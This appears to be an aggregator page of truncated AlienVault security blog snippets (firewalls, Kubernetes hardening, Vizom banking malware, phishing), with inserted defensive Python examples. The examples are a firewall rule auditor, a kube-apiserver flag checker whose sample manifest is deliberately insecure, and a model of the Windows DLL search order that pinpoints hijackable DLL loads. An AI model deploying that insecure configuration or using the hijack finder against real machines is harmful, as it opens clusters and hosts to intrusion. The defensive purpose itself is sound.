monitoring. Purchasing and setting up the firewall is only the first step in a long process. Common firewall issues and complexities The resources required to manage a firewall represent only a portion of the complexities involved. There are several less tangible issues that arise of which companies should be aware. 
Balancing user-friendliness and security Firewall rules become business inhibitors if they are too restrictive and don’t meet users' access requirements for specific applications or data. Conversely, granting more access than is needed to complete job duties can leave companies exposed to security breaches and data exfiltration. Absence of auditing While reviewing firewall rules regularly is considered a best practice, many companies miss this crucial step, so rule sets accumulate stale, redundant and overly broad entries that nobody notices. Inability to keep up with evolving threats As the threat landscape compounds and a company’s attack surface widens, so do the complexities of managing a firewall. Firewall configurations and rules that may have been sufficient just weeks or months ago aren’t necessarily effective at blocking cyber threats today. Multiple locations, many firewalls Each of the complexities mentioned above can be enough to handle for a single firewall — but many organizations require multiple firewalls. Each firewall has its own set of rules and configurations, so the work multiplies with each new firewall deployed. Complexity of industry compliance standards If your company processes payments online, your firewall will need to be PCI DSS compliant. However, merely installing a firewall on your company’s network won’t make you PCI DSS compliant. There are over 20 PCI DSS sub-requirements that set out how firewalls should be installed, updated, and maintained in order to be compliant. Benefits of having a service provider manage your firewall The benefits of working with a managed security service provider (MSSP) for your firewall management go well beyond solving the issues and complexities outlined above. Managed firewall services offer a diverse set of advantages. Empowering digital transformation IT environments are evolving as organizations accelerate adoption of SaaS Threat Patching Guideline
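The rule audit that the "Absence of auditing" point calls for can be mechanized. The following is an added example, not code from the AlienVault post or from any firewall vendor: it walks an ordered, first-match rule set and reports an any-to-any allow, rules that are shadowed by an earlier rule with the opposite action, and rules made redundant by an earlier rule with the same action. The Rule layout, the first-match semantics and the sample rules are assumptions constructed for this example.

```python
# Added example (not from the AlienVault post or any vendor's tooling): audit an
# ordered, first-match firewall rule set for an any-to-any allow and for rules
# that can never fire because an earlier rule already matches all their traffic.
# The Rule layout and the sample rules below are constructed for this example.
import ipaddress
from dataclasses import dataclass

ANY_NET = "0.0.0.0/0"
ANY_PORTS = (0, 65535)


@dataclass(frozen=True)
class Rule:
    name: str
    action: str      # "allow" or "deny"
    src: str         # source CIDR
    dst: str         # destination CIDR
    proto: str       # "tcp", "udp" or "any"
    ports: tuple     # inclusive (low, high) destination port range


def covers(outer: Rule, inner: Rule) -> bool:
    """True when every packet matched by `inner` is also matched by `outer`."""
    if outer.proto != "any" and outer.proto != inner.proto:
        return False
    if not (outer.ports[0] <= inner.ports[0] and inner.ports[1] <= outer.ports[1]):
        return False
    src_ok = ipaddress.ip_network(inner.src).subnet_of(ipaddress.ip_network(outer.src))
    dst_ok = ipaddress.ip_network(inner.dst).subnet_of(ipaddress.ip_network(outer.dst))
    return src_ok and dst_ok


def audit(rules: list) -> list:
    """Return (rule name, finding, detail) triples. Rules are evaluated top-down, first match wins."""
    findings = []
    for i, rule in enumerate(rules):
        if (rule.action == "allow" and rule.src == ANY_NET and rule.dst == ANY_NET
                and rule.proto == "any" and rule.ports == ANY_PORTS):
            findings.append((rule.name, "permissive", "allows any source to any destination on any port"))
        for earlier in rules[:i]:
            if covers(earlier, rule):
                # Same action: the later rule is dead weight. Different action: it is silently overridden.
                kind = "redundant" if earlier.action == rule.action else "shadowed"
                findings.append((rule.name, kind,
                                 f"never evaluated: '{earlier.name}' matches all of its traffic first"))
                break
    return findings


# Constructed sample rule set containing one instance of each problem
SAMPLE_RULES = [
    Rule("allow-web", "allow", ANY_NET, "10.0.1.0/24", "tcp", (443, 443)),
    Rule("deny-db-from-internet", "deny", ANY_NET, "10.0.2.0/24", "tcp", (5432, 5432)),
    Rule("allow-any", "allow", ANY_NET, ANY_NET, "any", ANY_PORTS),
    Rule("deny-ssh", "deny", ANY_NET, "10.0.0.0/8", "tcp", (22, 22)),
    Rule("allow-web-mgmt", "allow", "192.168.0.0/16", "10.0.1.0/24", "tcp", (443, 443)),
]

if __name__ == "__main__":
    for name, kind, detail in audit(SAMPLE_RULES):
        print(f"{kind:10} {name}: {detail}")
```

On the sample set the audit flags allow-any as permissive, deny-ssh as shadowed by allow-any (the deny never takes effect), and allow-web-mgmt as redundant with allow-web. Real firewalls add objects, zones, negation and stateful matching, so treat this as the shape of the check rather than a drop-in tool.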
AlienVault.webp 2020-12-07 11:00:00 Could electric vehicles present a Cybersecurity risk to the grid? (lien direct) (Image: electric car charging. Credit: Pexels) With many countries now participating in the Paris Agreement to address climate change, coupled with the rising popularity of electric vehicles, it is expected that 125 million electric cars will be on the road worldwide by 2030. But these cars, although beneficial to the environment, come with cybersecurity risks. According to experts, security concerns should be addressed before a massive rollout of electric vehicles takes place. While the United States has fewer than 5.4 million hybrid electric vehicles on its roads (based on numbers from 1999 to 2019), the slow growth of the American market might suddenly experience a spike before cybersecurity risks involving charging stations and the energy grid are reduced or removed.  Policy changes  As the United States started working on policy changes to reduce carbon emissions from its transport sector, 327,000 plug-in electric vehicles were sold in the country. And this was in 2019 alone. Although this is but a dent in the international market, electric vehicles have a bright future in the USA. Plug-in hybrids are popular because they run on both gasoline and electricity. Environmentally conscious motorists can use electricity to power their plug-ins, and still have a back-up system powered by gasoline if the need arises. And as expected, the savings are huge when it comes to fuel.  New York City noted recently that it is planning to spend $1 billion to improve its car charging infrastructure. Around 50,000 charging stations in NYC are said to be in the works, and are expected to be fully operational by 2025. The State of Florida is doing the same thing, while other states are offering incentives in the form of rebates to individuals who buy electric vehicles. 
Charging stations and cybersecurity attacks Although the rising popularity of electric vehicles is good news for America and the planet, their charging stations pose security risks. According to Yury Dvorkin, an electrical and computer engineering expert at New York University, charging stations can be entry points for cyberattacks directed at the American energy grid. The grid, Dvorkin says, is a complex mix of cyber and physical layers. Cybersecurity plays a crucial role in the United States’ transportation infrastructure and its interoperable power systems. Poorly implemented security in charging stations can have a negative impact on critical infrastructure, such as the grid itself and its operators, vehicles, and OEM vendors. Experts say that the concern is quite complicated, as it involves software and equipment vendors, stakeholders, and end users. Charging station vulnerabilities can lead to exploitation of the grid for gain, according to Dvorkin’s analysis. The assistant professor also explains in his research that electric vehicles charging at these stations could be hacked simultaneously and disrupt the grid’s stability. Such attacks are possible, according to other experts, because electric vehicles have control interfaces and communication interfaces that interact with the grid. There is good news, however, as Dvorkin and other computer engineering professors say that there is still time for the United States to prepare for Hack Guideline ★★
AlienVault.webp 2020-12-03 12:00:00 Two cybersecurity hygiene actions to improve your digital life in 2021 (lien direct) This blog was written by an independent guest blogger. It is that time of year again when we start planning resolutions for the coming year. A good start is putting cybersecurity at the top of the list, whether you are a business or an individual. According to a University of Maryland study, hackers attack every 39 seconds, on average 2,244 times a day. It may be even higher now that more of us are working remotely because of Covid19 and the attack surface has greatly expanded in numbers and vulnerability. Clearly, with the plethora of breaches, spam, and ransomware we already experienced in 2020, we need to be better prepared in 2021. What are a couple of cybersecurity hygiene action upgrades that will improve outcomes in 2021?   #1 Passwords Poor passwords have always been viewed as the low-hanging fruit for hackers and the easiest way into the crown jewels of data. Yet many still use common passwords such as 123456 or password, or birthdays, which pose little barrier to the bad guys accessing your accounts. In fact, a UK National Cyber Security Centre 2019 survey analysis discovered that 23.2 million victim accounts from all parts of the world used 123456 as a password. Another 7.8 million data breach victims chose a 12345678 password. More than 3.5 million people globally picked the word "password" to protect access to their sensitive information. Now that we have all become creatures of social media, hackers can use social engineering tactics by exploring your social media accounts, which often highlight pet names (quite often used as passwords - I admit I have been guilty of that too) or other identifiable items that may give clues to passwords and interests. What is particularly alarming is that there are algorithmic programs that can also use public social sites and marketing information to “guess” passwords.  
Actions: it is easy to get beyond the bad habit of using easily cracked passwords. Do not use default passwords on your devices, and when you do create passwords, make them complex. Consider making them long, or using phrases with letters, numbers and special characters. Also, do not reuse the same password across multiple accounts; make it impossible for hackers to get into everything with one stolen password. Make their challenge harder still by using multifactor or biometric authentication, such as a fingerprint, facial recognition, or a text message to verify it is you when you sign in. And if you want to make things less stressful on your memory (we all forget our passwords), consider using a security token and/or a password manager. The bottom line is that secure passwords are a basic step toward stronger cyber hygiene. #2  Phishing  Phishing is the tool of choice for many hackers. Phishing is commonly defined as a technique hackers use to exfiltrate your valuable data or to spread malware. Anyone can be fooled by a targeted phish, especially when it appears to come as a personal email from someone higher up the work chain, or from a bank, organization or website you may frequent. Usually the phishing malware comes via email attachments but it can also be web-based. According to an analysis by Webroot, 46,000 new phishing sites are created every day and 1.385 million new, unique phishing sites are created each month. At a more granular level, the firm Wandera says that a new phishing site launches every 20 seconds.  Advances in technology have made it easier for hackers to phish. They can use readily available digital graphics, apply social engineering data, and draw on a vast array of phishing tools, including some automated by machine learning. Phishing is often accompanied by ransomware, and a tactic for hackers is to target leadership a Ransomware Data Breach Malware Tool Vulnerability Threat Guideline
AlienVault.webp 2020-12-02 12:00:00 How to secure a Kubernetes cluster (lien direct) This blog was written by an independent guest blogger. More and more organizations are adopting Kubernetes, but they’re encountering security challenges along the way. In the fall 2020 edition of its “State of Container and Kubernetes Security” report, for instance, StackRox found that nearly 91% of surveyed organizations had adopted Kubernetes, with a majority (75%) of participants revealing that they had deployed the container orchestration platform into their production environments. Even so, nine in 10 respondents said that they had experienced a security incident involving a misconfiguration, vulnerability or runtime error in their container and Kubernetes environments over the last 12 months. Nearly half (44%) went on to say that they had delayed moving an application into production as a result of their security concerns. These findings highlight the need for organizations to ensure their Kubernetes configurations meet their security requirements. As part of this process, administrators can focus on protecting their clusters, which are the core of the Kubernetes architecture. After defining what a cluster is, this blog post will explore the two sets of components that exist within a cluster and provide guidance on how organizations can secure those components along the way. Understanding the Kubernetes cluster On its website, Kubernetes says that customers get a cluster—a set of one or more worker machines called “nodes” that are responsible for running a containerized application—whenever they deploy Kubernetes. These nodes host pods, groups of one or more containers which function as the application workload’s components. Ultimately, Kubernetes makes it possible for administrators to manage the nodes and the cluster more generally, including events that affect either, by using the control plane. 
Administrators can secure a Kubernetes cluster by directing their efforts specifically at the control plane and the worker nodes. The control plane Within the control plane, administrators can focus their security measures on five components: kube-apiserver, etcd, kube-scheduler, kube-controller-manager and cloud-controller-manager. kube-apiserver The kube-apiserver is the main implementation of a Kubernetes API server within a Kubernetes deployment. It scales horizontally: administrators deploy more instances of kube-apiserver to balance traffic within their environments. As the front end for the Kubernetes control plane, the API server is the component that exposes the Kubernetes API, which makes it the first thing to lock down. Administrators can secure it by upgrading to the newest version of Kubernetes and applying updates, thereby closing known security gaps. From there, administrators should restrict access to the API server by requiring authentication for every Kubernetes API client (and disabling anonymous access), enforcing authorization such as RBAC on every request, and ensuring all API traffic is encrypted using TLS. etcd A key-value store, etcd functions as the backing store for all Kubernetes cluster data, including every Secret in the cluster, so anyone who can read etcd, or a backup of it, effectively controls the cluster. Administrators should have a back-up plan for that data and protect the backups as carefully as the live store. As with the kube-apiserver, they can turn to encryption, authentication and access control as a means of controlling read and write access to that data store: etcd should accept only connections authenticated with client certificates, and encryption at rest should be enabled so that Secrets are not stored in plain text. kube-scheduler Within the control plane, administrators can use the kube-scheduler component to function for newly created pods that don’t have an a Vulnerability Uber
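The kube-apiserver and etcd guidance above can be checked against what a control plane is actually running. The following is an added example, not code from the AlienVault post or from the Kubernetes project: it pulls the `--flag=value` entries out of a kube-apiserver static pod manifest (kubeadm writes one at /etc/kubernetes/manifests/kube-apiserver.yaml) and reports settings that leave the API reachable without authentication or authorization, the etcd link unencrypted or unauthenticated, Secrets unencrypted at rest, or API access unlogged. Both manifests in the block are constructed for the example; the flag names are real kube-apiserver flags, and the kubeadm certificate paths in the hardened manifest are illustrative.

```python
# Added example (not from the AlienVault post or the Kubernetes project): audit the
# flags of a kube-apiserver static pod manifest for the hardening points above.
# Only the container command list is parsed, so no YAML library is required.
# Both manifests are constructed for this example.
import re

INSECURE_MANIFEST = """\
apiVersion: v1
kind: Pod
metadata:
  name: kube-apiserver
spec:
  containers:
  - command:
    - kube-apiserver
    - --advertise-address=10.0.0.10
    - --anonymous-auth=true
    - --authorization-mode=AlwaysAllow
    - --etcd-servers=http://127.0.0.1:2379
    - --secure-port=6443
    image: k8s.gcr.io/kube-apiserver:v1.19.0
"""

HARDENED_MANIFEST = """\
apiVersion: v1
kind: Pod
metadata:
  name: kube-apiserver
spec:
  containers:
  - command:
    - kube-apiserver
    - --advertise-address=10.0.0.10
    - --anonymous-auth=false
    - --authorization-mode=Node,RBAC
    - --client-ca-file=/etc/kubernetes/pki/ca.crt
    - --tls-cert-file=/etc/kubernetes/pki/apiserver.crt
    - --tls-private-key-file=/etc/kubernetes/pki/apiserver.key
    - --etcd-servers=https://127.0.0.1:2379
    - --etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt
    - --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt
    - --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key
    - --encryption-provider-config=/etc/kubernetes/encryption-config.yaml
    - --audit-log-path=/var/log/kubernetes/audit.log
    - --secure-port=6443
    image: k8s.gcr.io/kube-apiserver:v1.19.0
"""


def parse_flags(manifest: str) -> dict:
    """Collect `- --flag=value` list items from the manifest into a {flag: value} dict."""
    flags = {}
    for m in re.finditer(r"^\s*-\s+--([A-Za-z0-9-]+)(?:=(.*))?$", manifest, re.M):
        flags[m.group(1)] = (m.group(2) or "").strip()
    return flags


def audit_apiserver(flags: dict) -> list:
    """Return (flag, finding) pairs for settings that weaken API or etcd access."""
    f = []
    # Front door: who may talk to the API and how each request is authorized.
    if flags.get("anonymous-auth", "true") != "false":      # kube-apiserver defaults to true
        f.append(("anonymous-auth", "unauthenticated requests reach the API; set --anonymous-auth=false"))
    if "AlwaysAllow" in flags.get("authorization-mode", "AlwaysAllow").split(","):
        f.append(("authorization-mode", "AlwaysAllow skips authorization; use --authorization-mode=Node,RBAC"))
    if flags.get("insecure-port", "0") != "0":
        f.append(("insecure-port", "plaintext, unauthenticated API port is enabled; set --insecure-port=0"))
    if "client-ca-file" not in flags:
        f.append(("client-ca-file", "no client CA, so client-certificate authentication is not enabled"))
    if "tls-cert-file" not in flags or "tls-private-key-file" not in flags:
        f.append(("tls-cert-file", "no serving certificate given; the server falls back to a self-signed one"))
    # Backing store: etcd holds every Secret, so its link must be authenticated and its contents encrypted.
    if flags.get("etcd-servers", "").startswith("http://"):
        f.append(("etcd-servers", "etcd is reached over plaintext http://; use https:// with client certificates"))
    if not {"etcd-cafile", "etcd-certfile", "etcd-keyfile"} <= set(flags):
        f.append(("etcd-certfile", "apiserver does not authenticate to etcd with a client certificate"))
    if "encryption-provider-config" not in flags:
        f.append(("encryption-provider-config", "Secrets are written to etcd unencrypted"))
    if "audit-log-path" not in flags:
        f.append(("audit-log-path", "no audit log; API access is not recorded"))
    return f


if __name__ == "__main__":
    for label, manifest in (("insecure", INSECURE_MANIFEST), ("hardened", HARDENED_MANIFEST)):
        print(f"== {label}: {len(audit_apiserver(parse_flags(manifest)))} finding(s)")
        for flag, msg in audit_apiserver(parse_flags(manifest)):
            print(f"  --{flag}: {msg}")
```

Run it against a copy of the real manifest from a control plane node to see the same report; the hardened manifest produces no findings, the insecure one produces eight. The insecure-port check only fires when the flag is present, because the default has changed across Kubernetes releases.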
AlienVault.webp 2020-12-01 12:00:00 What is Vizom malware? Everything you need to know (lien direct) This blog was written by an independent guest blogger. Security researchers working with IBM Security recently uncovered a new malware code that is being used to attack online banking users in Brazil.  Referred to as ‘Vizom’ by the team, the code uses remote overlay attacks to siphon sensitive financial data and make fraudulent transactions from victims’ bank accounts. What’s particularly concerning about Vizom is its use of malicious DLLs (Dynamic Link Libraries): it gets a legitimate program on the victim’s operating system to load its own DLLs in place of the ones that program expects.  There has been a drastic increase in malware attacks in 2020 as cybercriminals have been eager to take advantage of the chaos of this year. Even though Vizom is currently mainly being used to target Brazilian-based accounts, there have been a handful of reports of it being used against bank accounts in other South American and European countries as well, so it’s likely to spread further.  In this article, we’ll go into the specifics of how Vizom works, what makes it so dangerous, and how the malware authors use DLL hijacking and overlays to their advantage. What is Vizom malware? Chen Nahman, Limor Kessem, and Ofir Ozer announced that the trio had discovered a new malware that targets people who use video conferencing software.  Spam-based phishing campaigns are the starting point for the spread of the Vizom malware, which disguises itself as a popular video conferencing application. Once downloaded, the malware begins work on a vulnerable operating system to start the infection chain. After getting access to an unprotected Windows PC, Vizom first writes to the AppData directory, using DLL hijacking so that a legitimate program loads the malicious DLLs it dropped there. For those of you who aren’t aware, a DLL, or dynamic link library, is a file that contains code for commonly used program functions on a PC. 
DLL hijacking, on the other hand, is a type of cyberattack that abuses the order in which Windows searches for a DLL when an application asks to load it. If an attacker can place a DLL with the expected name in a location that the loader checks before the legitimate copy, the application loads and runs the attacker’s code with its own privileges, without any exploit of the application itself; all it takes is the ability to write a file to the right directory on disk. Because DLLs are a fundamental building block of Windows, millions of PC users across the globe are at a higher risk of being duped. Until now, it was only Brazilian bank accounts that had been getting compromised, but as noted previously there are reports of it happening in other countries as well.  What is both ironic and concerning here is that video conferencing software is constantly being updated to tighten security. In fact, the whole idea of adopting DevOps methodologies like Continuous Integration and Delivery was to decrease the growing complexity involved in developing software systems. But even after all these precautions, cyberattackers are still succeeding in finding loopholes and developing new malware to exploit those loopholes. Vizom is just one example.  Vizom creates variants that are expected by legitimate software in their directories In this case, Vizom names its Delphi-based variants with labels that appear legitimate because they match the DLL names the software expects to find in its own directories. IB Malware
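The search-order abuse described above can be reasoned about without touching a real machine. The following is an added example, not code from the AlienVault post or from IBM’s analysis: it models the default Windows DLL search order (SafeDllSearchMode enabled, the default since Windows XP SP2), treats names in KnownDLLs as loaded straight from System32, and for each DLL an executable imports reports where the loader would find it and which user-writable directories are consulted first. The application name MeetApp, the DLL names vendorlib.dll and missing.dll, the directory layout and the KnownDLLs subset are all constructed for the example; the real loader also honours manifests, API sets and already-loaded modules, which this model omits.

```python
# Added example (not from the AlienVault post or IBM's analysis): a model of the
# default Windows DLL search order used to spot hijackable DLL loads. Every
# directory, file and DLL name below is constructed; nothing on disk is read.
from dataclasses import dataclass

# Illustrative subset of the KnownDLLs list. Names on that list are loaded from
# System32 directly and never go through the directory search.
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll"}

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"


@dataclass
class Dir:
    files: set               # lowercase file names present in the directory
    writable_by_user: bool   # can a standard (non-admin) user create files here?


def search_order(app_dir: str, cwd: str, path_dirs: list) -> list:
    """Default order with SafeDllSearchMode on: app dir, System32, 16-bit System, Windows, cwd, then PATH."""
    return [app_dir, SYSTEM32, SYSTEM16, WINDIR, cwd, *path_dirs]


def resolve(dll: str, app_dir: str, cwd: str, path_dirs: list, fs: dict):
    """Return (directory the loader picks or None, user-writable directories searched before it)."""
    dll = dll.lower()
    if dll in KNOWN_DLLS:
        return SYSTEM32, []
    writable_before = []
    for d in search_order(app_dir, cwd, path_dirs):
        entry = fs.get(d)
        if entry is None:          # directory does not exist on this machine
            continue
        if dll in entry.files:
            return d, writable_before
        if entry.writable_by_user:  # empty slot earlier in the order that a user could fill
            writable_before.append(d)
    return None, writable_before


def assess(imports: list, app_dir: str, cwd: str, path_dirs: list, fs: dict) -> dict:
    """Per imported DLL: where it loads from, and whether a standard user could substitute it."""
    report = {}
    for dll in imports:
        found, before = resolve(dll, app_dir, cwd, path_dirs, fs)
        location_writable = found is not None and fs[found].writable_by_user
        report[dll] = {
            "loaded_from": found,
            "writable_earlier": before,          # plant a same-named DLL here and it wins
            "location_writable": location_writable,  # the legitimate copy itself can be replaced
            "hijackable": bool(before) or location_writable,
        }
    return report


# Constructed filesystem: the same app installed per-user (under AppData, as the
# post describes) and machine-wide (under Program Files).
APP_USER = r"C:\Users\alice\AppData\Local\MeetApp"
APP_SYSTEM = r"C:\Program Files\MeetApp"
CWD = r"C:\Users\alice\Downloads"
PATH_DIRS = [r"C:\Tools"]
FS = {
    APP_USER: Dir({"meetapp.exe", "vendorlib.dll"}, writable_by_user=True),
    APP_SYSTEM: Dir({"meetapp.exe", "vendorlib.dll"}, writable_by_user=False),
    SYSTEM32: Dir({"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll", "version.dll"}, writable_by_user=False),
    SYSTEM16: Dir(set(), writable_by_user=False),
    WINDIR: Dir(set(), writable_by_user=False),
    CWD: Dir(set(), writable_by_user=True),
    r"C:\Tools": Dir(set(), writable_by_user=True),
}
IMPORTS = ["kernel32.dll", "vendorlib.dll", "version.dll", "missing.dll"]

if __name__ == "__main__":
    for label, app_dir in (("per-user install", APP_USER), ("Program Files install", APP_SYSTEM)):
        print(f"== {label}")
        for dll, r in assess(IMPORTS, app_dir, CWD, PATH_DIRS, FS).items():
            print(f"  {dll:14} from={r['loaded_from']!s:40} hijackable={r['hijackable']}")
```

With the per-user install every non-KnownDLL import is hijackable: vendorlib.dll lives in a directory the user can write to, version.dll is found in System32 only after the writable application directory has been searched, and missing.dll (a DLL the program requests but that is absent, a "phantom" load) falls through to the writable current directory and PATH entry. Moving the application to Program Files fixes the first two but not the phantom load, which is why unresolved imports are worth checking on any installed binary.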
AlienVault.webp 2020-11-30 18:03:00 The perfect storm: How digital transformation is reshaping security and networking (lien direct) Think back to the end of 2019. Enterprises were evolving IT infrastructure at a moderate pace to reduce costs, be more competitive, and improve their ability to adapt to an increasingly digitized world. Whether migrating workloads to the cloud, virtualizing network functions, diversifying mobility, or moving applications and services closer to the edge, digital transformation was steadily evolving the business landscape. Then came COVID, and in less than 12 months, digital transformation went from that steady evolution to an absolute imperative, accelerated by a suddenly remote workforce and the realization that the network (especially user access to data, services, and applications) and its security are the lifeblood of business. Conversations in the C-Suite quickly changed in tone, focusing on one crucial question: How quickly can we pivot and securely update or even rebuild our network to provide for future business continuity and remain competitive? Even as businesses continue to traverse the challenges of the pandemic and remote working, they are building on digital transformation strategies and investments so they can rebound to recovery. According to IDC, investment in digital transformation has been accelerated by the events of the last year, and it will continue to grow at a compound annual growth rate (CAGR) of 15.5% from 2020 to 2023, approaching $6.8 trillion. AT&T Cybersecurity also has seen a significant uptick in and acceleration of enterprises embarking on digital transformation. Typically, these initiatives involve wide area network (WAN) virtualization (a push to SD-WAN) and cloud migration paired with cybersecurity evolution. And they are being set in motion by both the network and security teams, depending on the organization’s priorities. 
Regardless of who is leading these initiatives, it’s the leadership of the organization that is pushing for change as they come to terms with the challenges of managing and protecting today’s highly complex networks and the connections that support them. With data, users, applications, and devices spread across hybrid environments, connecting to the network from hugely diverse locations, managing and controlling access — authentication and authorization — has taken on unprecedented priority and urgency. In the new reality of remote working, for example, employees must be able to access the applications and data needed to perform their jobs. Without that, the business is at a clear disadvantage. However, security teams are struggling not only to control who and what devices have access, but also to consider when, why, and for which purpose. This has brought the conversation about security to the forefront. Gone are the days of security as an afterthought. Today, a security-first mindset is driving the conversation. Because of this, security approaches like Zero Trust have become mainstream. To this point, a global survey of 1,000 enterprises conducted by AT&T in September 2020 revealed that 95% of enterprises are researching, implementing, or have completed implementation of a Zero Trust initiative in their network. In addition, as the mobility of the workforce continues to expand and IoT data consumption explodes with edge computing, the attack surface continues to become more complex. Security leaders will be looking for ways to consolidate security tools and decrease the number of vendors they’re working with. However, they also need complete visibility of their complex environment (still yet to be realized for many), to automate processes and in some cases preemptively orchestrate them using advanced analytics, and to improve response times for known threats and Vulnerability Threat Guideline
AlienVault.webp 2020-11-24 06:01:00 What is Third-Party Risk Management? (lien direct) Creating and maintaining relationships with third parties brings multiple risks. Whether your organization is large or small, it’s almost certain that you have business relationships with many third parties for specific types of operations. When operational data and confidential information are exchanged with third parties, that data and information are vulnerable to misuse and exploitation. This is where risk comes into the equation. Because these third parties may lack robust cybersecurity measures or compliance, building and maintaining a third-party risk management program is a crucial business decision. The process of Third-Party Risk Management (TPRM) involves identifying, assessing and controlling all the various risks that can develop over the entire lifecycle of your relationships with third parties. TPRM often begins during procurement and should continue until the offboarding process is complete. The big-picture potential risks are numerous, and can be reputational, strategic, managerial, and economic. More specific risks include data compromise, illegal use of information by third parties, the detrimental and damaging effects of non-compliance, and irregularities in supply chain management. TPRM by the numbers Still not convinced about the importance of TPRM? The numbers may change your mind. For example, between 2018 and 2019, security breaches increased by 11%, and by 67% since 2014. A 2020 Ponemon Institute report notes that over the past two years, 53% of organizations have experienced at least one third-party-caused data breach, with remediation costs averaging $7.5 million. And here’s what might be the most sobering statistic: According to a recent Osano report that observed the direct relationship between poor privacy practices and data breaches, the average American organization shares data with 730 distinct third-party vendors. 
Of those organizations hit with data breaches, third parties were responsible for two of every three. When you add COVID-19 to the mix, third-party cybersecurity risk is even more of a concern for legal and compliance leaders. Why is TPRM important? Third-party risk management is a hot topic today. Just think about how the supply chain has changed for almost every organization, especially with the digital transformation in place to meet the needs of a changing workforce. Whether it’s new cloud providers, new hosting providers, vendors or suppliers, there are many new companies with which we interact.  Even third parties you’ve done business with for years represent a security risk. Look at the infamous Target breach in 2013 — attackers were successful because an employee of Target’s third-party HVAC vendor opened a phishing email, which let the attackers obtain the vendor’s credentials for Target’s network. In this case, the HVAC vendor had more access to Target’s networks than it needed. TPRM mitigates this risk. Plus, today, almost all compliance requirements outline the need for continuous monitoring of your third-party supply chain. Let’s face it: far too often, businesses decide to take their suppliers’ word for it that yes, they are secure. Perhaps in many cases they are. But with so many vendors rotating in and out of our business, how do you manage access to your network or confidential data? When it comes to TPRM, some common questions that you need to ask are as follows: What type of data are third parties accessing? What type of access? Have you given them physical access? What would happen if the third party’s avai Ransomware Threat Guideline
AlienVault.webp 2020-11-18 12:00:00 5 questions every higher-ed security leader should ask (lien direct) Patrick Robinson and Mike McLaughlin contributed to this blog. In the day and age of COVID-19 we have witnessed a transformation of the way we work. If I were asked before March of 2020 how long it would take to make the progress in digital and security transformation that we as a society have made in the last 9 months, I would have guessed at least 5 years. The rate of adoption in the face of the pandemic has been unprecedented. Nowhere have the changes required to make remote working possible come on faster than in education. Whether it’s K-12 or higher education, remote access adoption and the security measures that accompany it have been implemented at a blistering pace. This article will lay out a few questions and requests that we at AT&T have been asked by education customers to help them build out better, faster and more secure access for their students, faculty and staff to accommodate the sudden change in workplaces and learning centers all across the U.S. How quickly can I get larger internet connections, and how can we secure those internet connections effectively from a global standpoint? The speed of a bandwidth increase for most clients depends on several things, such as facility availability, turn-up time with the carrier and contracting requirements between the customer and the carrier. As for the best way to protect internet connections with dedicated IP addresses, it’s a multipronged effort. With today’s cyber landscape, security decision makers have multiple attack vectors to consider when putting a cyber posture in place. Traditionally a firewall is a given. Firewalling an internet connection still holds true, but there is much more to evaluate.  Questions to ask yourself: What will you have behind that firewall? Will you deploy a demilitarized zone (DMZ) in the environment to host public-facing networks? 
Are you increasing bandwidth to accommodate remote workers? If so, how many workers will be internal to the network versus external workers who are dialing into the environment? How important is uptime to your business mission? Do you have anything deployed in the cloud that your external users would route to through the internal network (hair-pinning)? Do you want users to authenticate with network credentials once at the gateway, or to authenticate multiple times (once for VPN and once or more for network access)? Do you have multiple locations tying into the location with the increased bandwidth through site-to-site VPN or Software Defined Wide Area Networking? Do you utilize Multi-Protocol Label Switching (MPLS) between sites? Do you have industry compliance requirements to meet? Will you be running Next Generation Firewall subscription services on your gateway (edge) firewalls? Do your organization’s uptime requirements call for a high-availability configuration in order to achieve at least five-nines (99.999%) reliability? As you can see, there isn’t just one definitive answer to the question “what should I use to protect my users, internal network and upgraded bandwidth?” With the number of Distributed Denial of Service (DDoS) attacks that have become so prevalent at higher-ed institutions in the last year, DDoS mitigation services are essential and are usually very affordable for monitoring volumetric attacks. However, of course, the more that the customer monitors for, and the more mitigation time that the customer requires, the more expensive the service can become. A few things to think about with DDoS attacks when deciding what you need for your new circuit: Where might the attacks be coming from? Do a little research on the attack vectors for D Ransomware Malware Guideline
AlienVault.webp 2020-11-17 18:14:00 Phishing awareness and phishing training explained (lien direct) There is no more effective initial attack vector than phishing. With an ability to reach well within your organization’s logical perimeter, all the way down to an individual user’s inbox, with some form of malicious content, phishing has proven to be a challenge to organizations working to maintain a proper security stance.  On top of this, phishing attacks have some pretty impressive accolades: Phishing scams focused on Business Email Compromise are the initial attack vector in 60% of cyber insurance claims 61% of successful phishing attacks have resulted in compromised credentials Phishing accounts for losses of $17,700 per minute The exponential growth seen this year in phishing attacks and their success is extremely dangerous when combined with operational shifts to users working from home, using personal devices and lowering their sense of corporate vigilance as part of trying to find a work/life balance. The use of social engineering techniques such as domain, brand, or user impersonation augments the credibility of phishing scams at a time when users’ guard is at an all-time low. The current state of both cyberattacks and lack of cyber-readiness dictates that your organization look to elevate its security stance by making its users more aware of phishing attacks, the methods used, and the repercussions of a successful attack. What is phishing awareness?  First off, it’s important to differentiate phishing awareness from security awareness. Security awareness programs and training seek to create a security culture within an organization, of which being aware of phishing attacks is one part. Phishing awareness is more narrowly focused on the what, why, and when of phishing attacks and how to avoid becoming a victim. 
Common types of phishing attacks  Phishing attacks utilize a number of mediums, leveraging common tactics to get potential victims to respond in the desired fashion. Some of the mediums include: Phishing (email) – Most people familiar with phishing instantly think of email as the medium.  It’s the easiest way for attackers to get the undivided attention of their intended victims en masse, using automated tools to hit literally hundreds of thousands to millions of individuals with a single click. Spear Phishing (email) – Attackers intent on targeting certain companies, industries, or even individuals will send out phishing attacks created specifically for that victim. Whaling (email) – Whaling attacks are spear phishing campaigns targeting executives, generally relying on social engineering alone to trick the C-level exec into becoming a victim. Vishing (phone) – Phone calls can be a viable medium to trick individuals into resetting passwords, giving up credit card details, and more.  Attackers have gone as far as to use deepfake audio – a technology that allows them to sound like anyone they want, including your CEO – to trick users over the phone. SMiShing (text message) – Similar to email as a means of getting directly to the victim in question, SMiShing uses text messages to direct victims to websites intent on infecting mobile devices, stealing online credentials, or obtaining personal details.
